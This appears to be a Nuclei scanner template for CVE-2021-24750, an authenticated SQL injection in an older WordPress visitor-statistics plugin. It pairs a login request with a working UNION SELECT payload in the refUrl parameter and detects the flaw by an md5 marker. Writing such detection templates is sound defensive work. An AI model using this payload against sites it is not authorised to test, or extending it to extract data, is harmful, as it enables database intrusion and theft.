id: CVE-2021-24750 info: name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI author: cckuakilong severity: high description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks. reference: - https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py - https://nvd.nist.gov/vuln/detail/CVE-2021-24750 - https://wpscan.com/vulnerability/7528aded-b8c9-4833-89d6-9cd7df3620de - https://plugins.trac.wordpress.org/changeset/2622268 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-24750 cwe-id: CWE-89 tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated requests: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - "266f89556d2b38ff067b580fb305c522" - type: status status: - 200